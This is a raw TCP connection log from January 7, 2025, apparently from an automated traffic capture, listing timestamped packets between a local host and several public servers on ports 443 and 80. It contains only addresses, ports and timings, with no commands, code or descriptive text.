                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.505561113 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.505598068 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.505601883 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.505651951 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.505883932 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.505899906 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.506006956 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.506011963 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.509629011 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.509651899 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.509716034 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.509727001 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.509756088 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.509783030 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.520200968 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.520226002 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.520287991 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.520294905 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.520315886 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.520342112 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.528633118 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.528654099 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.528722048 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.528728008 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.528773069 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.537995100 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.538013935 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.538119078 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.538126945 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.538196087 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.603874922 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.603913069 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.603975058 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.603986025 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604017019 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604043007 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604108095 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604125023 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604161024 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604165077 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604192019 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604244947 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604429007 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604445934 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604484081 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604487896 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604520082 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604528904 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604729891 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604748964 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604800940 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.604805946 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.605108023 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.605123043 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.605182886 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.605189085 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.605982065 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.613300085 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.613322020 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.613383055 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.613389015 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.613797903 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.623079062 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.623112917 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.623142958 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.623147011 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.623181105 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.623214960 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.630271912 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.630296946 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.630336046 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.630341053 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.630363941 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.630433083 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.674247026 CET44349803185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.674609900 CET49803443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.674634933 CET44349803185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.675039053 CET44349803185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.675343990 CET49803443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.675415993 CET44349803185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.675498009 CET49803443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.687771082 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.687803030 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.687855959 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.687865973 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.687912941 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.687933922 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688047886 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688066006 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688122988 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688127041 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688194990 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688194990 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688451052 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688466072 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688539028 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688544989 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688705921 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688846111 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688863993 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688905001 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688909054 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688944101 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.688951969 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.693084002 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.693130970 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.693157911 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.693162918 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.693183899 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.693203926 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.693233967 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.693461895 CET49796443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.693475008 CET44349796185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.719324112 CET44349803185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.728048086 CET44349802185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.728410959 CET49802443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.728436947 CET44349802185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.728787899 CET44349802185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.729108095 CET49802443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.729172945 CET44349802185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.729254961 CET49802443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.775340080 CET44349802185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.783669949 CET49802443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.796353102 CET44349804185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.796658993 CET49804443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.796674013 CET44349804185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.797846079 CET44349804185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.797902107 CET49804443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.797910929 CET44349804185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.797955036 CET49804443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.799060106 CET49804443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.799135923 CET44349804185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.799292088 CET49804443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.799298048 CET44349804185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.847703934 CET49804443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.921766043 CET44349803185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.921778917 CET44349803185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.921838999 CET49803443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.921854019 CET44349803185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.921863079 CET44349803185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.921912909 CET49803443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.922574997 CET49803443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.922585964 CET44349803185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.995230913 CET44349802185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.995249033 CET44349802185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.995256901 CET44349802185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.995297909 CET44349802185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.995305061 CET44349802185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.995310068 CET49802443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.995352983 CET44349802185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.995358944 CET44349802185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.995364904 CET49802443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.995377064 CET44349802185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.995420933 CET49802443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.995436907 CET49802443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.996397972 CET49802443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.996409893 CET44349802185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.016196966 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.020005941 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.020015001 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.020988941 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.021061897 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.021068096 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.021140099 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.021385908 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.021440029 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.021532059 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.047044992 CET44349804185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.047121048 CET44349804185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.047225952 CET49804443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.047878981 CET49804443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.047890902 CET44349804185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.058294058 CET49806443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.058315992 CET44349806185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.058393002 CET49806443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.058614016 CET49806443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.058628082 CET44349806185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.063328981 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.070662022 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.070667982 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.118669033 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.279863119 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.279891968 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.279895067 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.279969931 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.279974937 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.279978991 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.280038118 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.280040979 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.280044079 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.280109882 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.355026960 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.355038881 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.355083942 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.355114937 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.355124950 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.355129957 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.355189085 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.355189085 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.359045029 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.359138012 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.384906054 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.384927988 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.384985924 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.384993076 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.385020971 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.385062933 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.444750071 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.444783926 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.444895029 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.444901943 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.444989920 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.446513891 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.446537971 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.446620941 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.446625948 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.446686983 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.459526062 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.459546089 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.459613085 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.459619045 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.459669113 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.697415113 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.697444916 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.697488070 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.697510958 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.697520018 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.697552919 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.697561026 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.697598934 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.697628975 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.697839022 CET49805443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.697850943 CET44349805185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.750541925 CET44349806185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.750792027 CET49806443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.750808001 CET44349806185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.751868963 CET44349806185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.751933098 CET49806443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.751950979 CET44349806185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.752197027 CET49806443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.752330065 CET49806443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.752387047 CET44349806185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.752418041 CET49806443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.799329996 CET44349806185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.802690029 CET49806443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.802700043 CET44349806185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.850691080 CET49806443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.994746923 CET44349806185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.994843960 CET44349806185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.994995117 CET49806443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.995846987 CET49806443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.995867014 CET44349806185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:06.426287889 CET4969780192.168.2.16199.232.210.172
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:06.426374912 CET4969880192.168.2.16199.232.210.172
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:06.431436062 CET8049697199.232.210.172192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:06.431518078 CET4969780192.168.2.16199.232.210.172
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:06.431548119 CET8049698199.232.210.172192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:06.431600094 CET4969880192.168.2.16199.232.210.172
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:08.586941004 CET44349755165.140.202.235192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:08.587022066 CET44349755165.140.202.235192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:08.587106943 CET49755443192.168.2.16165.140.202.235
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:10.498437881 CET49755443192.168.2.16165.140.202.235
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:10.498471975 CET44349755165.140.202.235192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.087352037 CET49810443192.168.2.16142.250.185.196
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.087368965 CET44349810142.250.185.196192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.087476969 CET49810443192.168.2.16142.250.185.196
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.087697029 CET49810443192.168.2.16142.250.185.196
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.087711096 CET44349810142.250.185.196192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.708090067 CET49811443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.708108902 CET44349811185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.708209991 CET49811443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.708477020 CET49811443192.168.2.16185.15.59.224
